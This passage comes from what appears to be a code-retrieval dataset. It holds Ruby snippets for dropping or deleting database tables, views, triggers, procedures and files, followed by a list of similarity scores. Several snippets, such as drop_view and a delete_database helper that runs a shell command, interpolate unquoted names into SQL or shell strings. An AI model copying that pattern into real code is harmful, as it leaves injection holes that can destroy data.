"def destroy(*args)\n if self.gr_can_destroy?\n unless new_record?\n connection.delete(\n \"DELETE FROM #{self.class.quoted_table_name} \" +\n \"WHERE #{connection.quote_column_name(self.class.primary_key)} = #{quoted_id}\",\n \"#{self.class.name} Destroy\"\n )\n end\n @destroyed = true\n freeze\n else\n eval_violation(:destroy_access)\n end\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete(name)\n\n end",
"def destroy\n dbf.destroy\n rescue MissingSource\n ensure\n freeze\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop_view(name)\n execute(\"DROP VIEW #{name}\")\n end",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def destroy_database(name)\n database = ::MySQL::Database.find_by_name(name)\n return false if database.nil?\n !!database.destroy\n end",
"def drop _args\n \"drop _args;\" \n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def remove_plugin(name)\n @data[\"installed\"].delete(name)\n save!\n end",
"def destroy\n # delete object from the DB\n # DB.execute(\"DELETE .....\")\n end",
"def to_drop_database_sql(db)\n db.send(:drop_database_sql, self.name, {})\n end",
"def drop_trigger(table, name, opts=OPTS)\n self << drop_trigger_sql(table, name, opts)\n end",
"def delete\n validate_presence_of :name\n wrapper.delete_tag(@name) || raise(OperationFailed)\n end",
"def remove_trigger(table, name, options={})\n options[:name] = name\n execute \"DROP TRIGGER #{trigger_name(table, [], options).to_sql_name} ON #{table} #{cascade_or_restrict(options[:deep])};\"\n end",
"def remove_trigger(table, name, options={})\n options[:name] = name\n execute \"DROP TRIGGER #{trigger_name(table, [], options).to_sql_name} ON #{table} #{cascade_or_restrict(options[:deep])};\"\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::DropView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n options = env.options\n materialized = options[:materialized] ? 'MATERIALIZED' : ''\n sql = \"DROP #{materialized} VIEW\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def exec_delete(sql, name = 'SQL', binds = [])\n log(sql, name, binds) do\n result = without_prepared_statement?(binds) ? exec_no_cache(sql) :\n exec_cache(sql, binds)\n affected = result.cmd_tuples\n result.clear\n affected\n end\n end",
"def remove(name)\n path = repository_path(name)\n File.exists?(path) && FileUtils.rm_rf(path) && true\n end",
"def delete_user (db, user_name)\n\tdb.execute(\"DELETE FROM users WHERE user_name=?\", [user_name])\nend",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def exec__psql_db_batch__drop_owned_current_user *args\n psql_db = psql_db__sample_example\n drop_all_batch = psql_db_batch__db_queries_method psql_db, :db_queries__drop_owned_current_user\n batch = drop_all_batch\n batch_commands batch\n end",
"def delete(name)\n File.delete(path(name))\n end"
] |
[
"0.79073864",
"0.786958",
"0.7367995",
"0.7303213",
"0.71446484",
"0.71446484",
"0.7094034",
"0.70206577",
"0.5780303",
"0.5701886",
"0.56950027",
"0.56453824",
"0.5614687",
"0.5581923",
"0.5575382",
"0.55501544",
"0.54821366",
"0.54505163",
"0.54489833",
"0.54471713",
"0.5421345",
"0.5401057",
"0.53991765",
"0.53938234",
"0.53880036",
"0.5383386",
"0.5336844",
"0.5329802",
"0.53253376",
"0.53226584",
"0.52973557",
"0.52648395",
"0.52591866",
"0.52402186",
"0.5193811",
"0.51908237",
"0.5186675",
"0.5166292",
"0.5164138",
"0.5154705",
"0.5149008",
"0.514873",
"0.5148249",
"0.5136171",
"0.51352465",
"0.5132804",
"0.5115556",
"0.509145",
"0.5090269",
"0.50896484",
"0.5086773",
"0.5078627",
"0.50775003",
"0.50772554",
"0.50648063",
"0.506441",
"0.50603926",
"0.50597364",
"0.50452155",
"0.5044218",
"0.5041983",
"0.5039609",
"0.50367254",
"0.502629",
"0.502629",
"0.5025144",
"0.500955",
"0.500909",
"0.50070864",
"0.50070864",
"0.5005969",
"0.49926084",
"0.49745518",
"0.49742237",
"0.49699685",
"0.49699682",
"0.49674943",
"0.4964015",
"0.4948186",
"0.49475643",
"0.49428996",
"0.49428996",
"0.49386415",
"0.49374786",
"0.49360073",
"0.4927944",
"0.4923276",
"0.49194747",
"0.49194747",
"0.49184203",
"0.49170375",
"0.49125722",
"0.4898871",
"0.48841554",
"0.4879808",
"0.4878988",
"0.48774666",
"0.48694623",
"0.48687428",
"0.48515138"
] |
0.74234545
|
2
|
Drops a procedural language from the database. Arguments: name :: name of the procedural language to drop opts :: options hash: :cascade :: Drop other objects depending on this language. :if_exists :: Don't raise an error if the language doesn't exist.
|
def drop_language(name, opts=OPTS)
self << drop_language_sql(name, opts)
end
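
A minimal usage sketch of the method above, assuming Sequel's postgres adapter; the connection URL and language name are hypothetical. Database#<< executes the generated DDL, so this runs the statement directly:

require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb') # hypothetical URL

# Executes: DROP LANGUAGE IF EXISTS plpgsql CASCADE
DB.drop_language(:plpgsql, if_exists: true, cascade: true)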
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def remove(name)\n if hook = by_name(name)\n hook.destroy!\n end\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def delete(sql, name = nil)\n delete_sql(sql, name)\n end",
"def drop_function(name, opts=OPTS)\n self << drop_function_sql(name, opts)\n end",
"def delete(name)\n @driver.deleteRule([name])\n end",
"def delete_sql(sql, name = nil)\n update_sql(sql, name)\n end",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def delete(sql, name = nil) end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def drop_subscription(name, ifexists = false)\n typed_exec(\"DROP SUBSCRIPTION#{\" IF EXISTS\" if ifexists} #{connection.quote_ident(name)}\")\n end",
"def remove_plugin(name)\n @data[\"installed\"].delete(name)\n save!\n end",
"def delete_program_by_name(name)\n item = getProgramByName(name)\n item.destroy\nend",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def drop_function(function_name, options = {})\n function_name = full_function_name(function_name, options)\n\n execute \"DROP FUNCTION #{function_name}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def destroy\n @language_type.destroy\n\n head :no_content\n end",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def remove_by_name(name)\n fw = get_by_name(name)\n if (fw != nil)\n return remove(fw)\n end \n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_function(function_name, options)\n\n end",
"def remove(name)\n template = find(name)\n shell.rm_rf(template.path) if template\n end",
"def remove_sound(name)\n music = MSPhysics::Music.get_by_name(name)\n MSPhysics::Music.destroy(music) if music\n dict1 = Sketchup.active_model.attribute_dictionary('MSPhysics Sounds', false)\n dict1.delete_key(name.to_s) if dict1\n dict2 = Sketchup.active_model.attribute_dictionary('MSPhysics Sound Types', false)\n dict2.delete_key(name.to_s) if dict2\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def remove\n return unless confirm_command\n\n args.each do |name|\n messages = nil\n if name.start_with? \"HEROKU_POSTGRESQL_\"\n name = name.chomp(\"_URL\").freeze\n end\n action(\"Removing #{name} on #{app}\") do\n messages = addon_run { heroku.uninstall_addon(app, name, :confirm => app) }\n end\n display(messages[:attachment]) if messages[:attachment]\n display(messages[:message]) if messages[:message]\n end\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop(name)\n tuples = primary.lookup_vals(name)\n return delete(tuples).size > 0\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def destroy\n dbf.destroy\n rescue MissingSource\n ensure\n freeze\n end",
"def remove_language\n expression_language = ExpressionLanguage.find(params[:expression_language_id]) unless params[:expression_language_id].blank?\n @expression = expression_language.expression\n \n if !expression_language.blank?\n if expression_language.destroy\n # update related work for solr indexing\n work = @expression.work\n work.save\n end\n end\n \n render :partial => 'languages_form', :locals => { :expression => @expression }\n end",
"def drop_translated_table\n self.connection.drop_table translation_table_name\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def destroy\n @language_user.destroy\n end",
"def remove_technique(name)\n @techniques.delete(name)\n end",
"def remove_by_name(name)\n p = get_by_name(name)\n if (p != nil)\n return remove(p)\n end \n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def destroy\n @programming_language.destroy\n respond_to do |format|\n format.html { redirect_to programming_languages_url, notice: 'Programming language was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def delete_hook(name, hook_function_name)\n @hooks[name] ||= {}\n @hooks[name].delete(hook_function_name)\n end",
"def delete(name); end",
"def delete(name); end",
"def destroy\n if @language[:default] ='true'\n Language.where(\"id != #{@language[:id]}\").first().update_attributes(:default => true)\n end\n if @language.destroy\n flash[:notice] = I18n.t('admin.languages.destroy.success', :name => @language.name)\n else\n flash[:notice] = I18n.t('admin.languages.destroy.failure', :name => @language.name)\n end\n\n redirect_to :action => :index\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete!\n StoredProcedures.delete(self.id) if self.id\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def delete_layer(layer_name)\n @cascade.delete(layer_name)\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def remove name\n delete(name)\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def unload name\n raise \"Cannot unload: No such script #{name}\" unless @scripts.has_key? name\n\n @scripts[name].die if @scripts[name].respond_to? \"die\"\n\n @scripts[name].unregister_script\n @scripts[name].unregister_commands\n @scripts[name].unregister_events\n\n @scripts.delete name\n end",
"def exec_delete(sql, name, binds)\n execute(sql, name, binds)\n end",
"def delete(name)\n raise('wrong type: String required') unless name.is_a?(String)\n raise('wrong value: name must be valid') unless !name.nil? && !name.empty?\n\n @client.post({\n 'action' => 'del',\n 'object' => 'htpl',\n 'values' => name,\n }.to_json)\n end",
"def remove(name)\n sudo \"rm -rf #{god_confd}/#{name}\"\n end",
"def destroy\n @accountadmin_language = AccountadminLanguage.find(params[:id])\n @accountadmin_language.destroy\n\n unless @accountadmin_language.errors.empty?\n flash[:notice] = \"WARNING: Couldn't delete language because:\"\n @accountadmin_language.errors.full_messages.each { |m| flash[:notice] << \"<br/>\" << m }\n end\n\n respond_to do |format|\n format.html { redirect_to(accountadmin_languages_url) }\n format.xml { head :ok }\n end\n end",
"def remove(selector={})\n @db.remove_from_db(@name, selector)\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def delete_code(cheatsheet_db, language, delete_by, delete_this)\n cheatsheet_db.execute(\"DELETE FROM #{language} WHERE #{delete_by}=#{delete_this}\")\nend",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop\n Statements::DropFunction.new(context: self)\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def delete(name)\n @ctx.delete(@path + name)\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def delete(name)\r\n key = convert_key(name)\r\n return false unless has(key)\r\n @p.delete(key)\r\n true\r\n end",
"def drop_rule(name, table)\n execute \"DROP RULE #{quote_rule(name)} ON #{quote_table_name(table)};\"\n end",
"def delete_game\n\t\tall_saved_games = yaml_load(SAVED_FILENAME)\n\t\tgame_name = get_game_name(all_saved_games, \"delete\")\n\t\treturn if game_name.nil?\n\n\t\tall_saved_games.delete(game_name)\n\t\tyaml_save(SAVED_FILENAME, all_saved_games)\n\t\tmessage_then_enter \"'#{ game_name }' successfully deleted.\"\n\tend",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def remove_variable(name)\n if @handle.ptr == nil\n raise \"this is disposed\"\n end\n Native.RunEditor_remove_variable(@handle.ptr, name)\n end",
"def delete_po\r\n\r\n FileUtils.rm_rf \"#{Rails.root}/po/#{params[:locale]}\"\r\n redirect_to locales_path\r\n end",
"def destroy\n @language = Language.find(params[:id])\n @language.destroy\n\n respond_to do |format|\n format.html { redirect_to(languages_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @language = Language.find(params[:id])\n @language.destroy\n\n respond_to do |format|\n format.html { redirect_to(languages_url) }\n format.xml { head :ok }\n end\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def destroy\n @languagename.destroy\n respond_to do |format|\n format.html { redirect_to languagenames_url, notice: 'Languagename was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def remove_from(type, name)\n\n #Find if the object exists\n index = search(type, name)\n\n #Stops if exercise list is empty\n if index == -1\n return -1\n end\n\n #Removes an exercise object\n if type == \"exercise\"\n @exercise_list.delete_at(index)\n return 0\n #Removes a workout object\n elsif type == \"workout\"\n @workout_routines.delete_at(index)\n return 0\n #Error handling\n else\n return -1\n end\n end",
"def destroy\n @pug.destroy\n\n head :no_content\n end",
"def remove_stored_function(function_name)\n return false unless self[SYSTEM_JS_COLLECTION].find_one({\"_id\" => function_name})\n self[SYSTEM_JS_COLLECTION].remove({\"_id\" => function_name}, :w => 1)\n end",
"def delete(id)\n StoredProcedures.delete(as_id(id))\n end",
"def drop_collection(name)\n return false if strict? && !collection_names.include?(name.to_s)\n begin\n ok?(command(:drop => name))\n rescue OperationFailure => e\n false\n end\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def delete(name)\n File.delete(path(name))\n end",
"def destroy\n\t\t@language = Language.find(params[:id])\n\t\t@language.destroy\n\n\t\trespond_with @language do |format|\n\t\t\tformat.html { redirect_to languages_url }\n\t\t\tformat.json { head :ok }\n\t\tend\n\tend",
"def delete(name, options = T.unsafe(nil)); end",
"def remove_pet_by_name(pet_shop, pet_name)\n pet_to_delete = find_pet_by_name(pet_shop, pet_name)\n pet_shop[:pets].delete(pet_to_delete)\nend",
"def destroy_database(name)\n database = ::MySQL::Database.find_by_name(name)\n return false if database.nil?\n !!database.destroy\n end",
"def delete_translations\n end",
"def destroy\n @language_dialect.destroy\n respond_to do |format|\n format.html { redirect_to language_dialects_url, notice: 'Language dialect was successfully destroyed.' }\n format.json { head :no_content }\n end\n end"
] |
[
"0.771682",
"0.62814724",
"0.6009372",
"0.6009372",
"0.5947735",
"0.5887368",
"0.58383554",
"0.58220875",
"0.57442856",
"0.5699863",
"0.56750304",
"0.56655055",
"0.5662529",
"0.562056",
"0.5534475",
"0.551798",
"0.54874253",
"0.54649365",
"0.5445987",
"0.54157716",
"0.5367591",
"0.53582484",
"0.5357611",
"0.53406286",
"0.5299497",
"0.5294444",
"0.52835304",
"0.5273564",
"0.5259413",
"0.5259413",
"0.5245033",
"0.52366674",
"0.52238023",
"0.52198315",
"0.5192227",
"0.5164574",
"0.5162842",
"0.51559013",
"0.514678",
"0.514513",
"0.5130205",
"0.51191735",
"0.5117823",
"0.51155126",
"0.51115906",
"0.5101914",
"0.5096802",
"0.5067832",
"0.50514776",
"0.5044741",
"0.503996",
"0.50316346",
"0.50316346",
"0.5023673",
"0.49952167",
"0.49830514",
"0.49826768",
"0.49818218",
"0.4976098",
"0.49651456",
"0.4959482",
"0.49532235",
"0.49488407",
"0.4947797",
"0.49403015",
"0.49386197",
"0.49384513",
"0.4929347",
"0.4926984",
"0.49249583",
"0.49243394",
"0.4922462",
"0.49174654",
"0.4905779",
"0.49040192",
"0.49006394",
"0.48970205",
"0.48942992",
"0.48939383",
"0.4893469",
"0.48933306",
"0.48747745",
"0.48747745",
"0.48648414",
"0.4858034",
"0.48559278",
"0.48556748",
"0.48520952",
"0.4845849",
"0.48458135",
"0.48439094",
"0.4841691",
"0.48411638",
"0.48347443",
"0.4834459",
"0.48314127",
"0.48264185",
"0.48229218",
"0.48227003",
"0.48146015"
] |
0.71211535
|
1
|
Drops a schema from the database. Arguments: name :: name of the schema to drop opts :: options hash: :cascade :: Drop all objects in this schema. :if_exists :: Don't raise an error if the schema doesn't exist.
|
def drop_schema(name, opts=OPTS)
self << drop_schema_sql(name, opts)
end
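
A minimal usage sketch of the method above, assuming Sequel's postgres adapter; the connection URL and schema name are hypothetical:

require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb') # hypothetical URL

# Executes: DROP SCHEMA IF EXISTS "reporting" CASCADE
DB.drop_schema(:reporting, if_exists: true, cascade: true)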
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_schema(schema_name, options = {})\n execute \"DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE\"\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_schema(schema_name)\n execute(\"DROP SCHEMA \\\"#{schema_name}\\\"\")\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def delete\n ensure_service!\n service.delete_schema name\n true\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def unload_schema(schema_name)\n end",
"def drop_schema(schema)\n execute \"DROP SCHEMA #{schema} RESTRICT\", 'Drop Schema'\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def destroy_schema\n Apartment::Tenant.drop(schema_name)\n Rails.logger.info(\"Tenant dropped: #{schema_name}\")\n rescue Apartment::TenantNotFound => e\n Rails.logger.warn(\"Failed to drop tenant (not found): #{schema_name}\")\n raise e if Rails.env.production? # Don't raise an exception in dev mode so to allow seeds to work\n end",
"def drop_tablespace(name, options = {})\n sql = 'DROP TABLESPACE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_tablespace(name)\n\n execute(\"#{sql};\")\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def drop\n\t\tActiveRecord::Base.connection.execute \"SET AUTOCOMMIT=0\"\n\t\tActiveRecord::Base.connection.execute \"SET FOREIGN_KEY_CHECKS=0\"\n\n self.change_schema_to 'information_schema';\n @result[:deleted] = []\n \n if request[:remove_all]\n #remove all tables\n @tables = ActiveRecord::Base.connection.select_all \"select TABLE_NAME table_name from `TABLES` where `TABLE_SCHEMA`='#{request[:db_name]}'\"\n self.change_schema_to request[:db_name];\n \n @tables.each do |table|\n ActiveRecord::Base.connection.execute \"drop table `#{table[\"table_name\"]}`\"\n @result[:deleted].push table[\"table_name\"];\n end\n else\n self.change_schema_to request[:db_name];\n ActiveRecord::Base.connection.execute \"drop table `#{request[:key]}`\";\n @result[:deleted].push request[:key];\n end\n \n self.change_schema_to 'information_schema';\n @result[:type] = 'table'\n render json: @result\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def destroy_database(name)\n database = ::MySQL::Database.find_by_name(name)\n return false if database.nil?\n !!database.destroy\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_sequence(sequence_name, options = {})\n SchemaMonkey::Middleware::Migration::DropSequence.start(connection: self, sequence_name: sequence_name, sequence_options: options) do |env|\n sequence_name = env.sequence_name\n options = env.sequence_options\n sql = \"DROP SEQUENCE\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(sequence_name)}\"\n execute sql\n end\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def destroy\n @schema = Schema.find(params[:id])\n @schema.destroy\n\n respond_to do |format|\n format.html { redirect_to schemas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema = Schema.find(params[:id])\n @schema.destroy\n\n respond_to do |format|\n format.html { redirect_to schemas_url }\n format.json { head :no_content }\n end\n end",
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
